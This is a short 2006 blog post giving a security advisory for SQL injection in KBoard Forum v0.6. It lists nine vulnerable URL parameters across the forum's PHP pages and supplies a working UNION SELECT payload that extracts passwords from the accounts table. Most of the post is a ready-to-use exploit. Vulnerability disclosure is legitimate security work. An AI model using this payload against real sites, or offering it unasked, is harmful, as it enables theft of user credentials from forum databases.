Thursday, September 28, 2006

KBoard v0.6 Sql Injection

#######################################
+Advisory #1
+KBoard v0.6 Sql Injection
+Product : KBoard Forum v0.6
+Develop : http://sourceforge.net/project/showfiles.php?group_id=92748
+Class: SQL injection
+Risk:High
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa;)
########################################
~Auth:

Examples:
--------
index.php?id='[SQL]
user_posthistory.php?search_id='[SQL]
user_profile.php?id='[SQl]
forum_threadlist.php?forum_id='[SQL]
post_thread.php?forum_id='[SQL]
thread_view.php?thread_id='[SQL]
thread_view.php?forum_id='[SQL]
addressbook_add.php?id='[SQL]
account_edit.php?accountselected=1&aid='[SQL]


Vulnerable:

http://site/path/index.php?id=991199'UNION SELECT id,id,password,password,sig,id FROM accounts/*

0 Comments:

Post a Comment

<< Home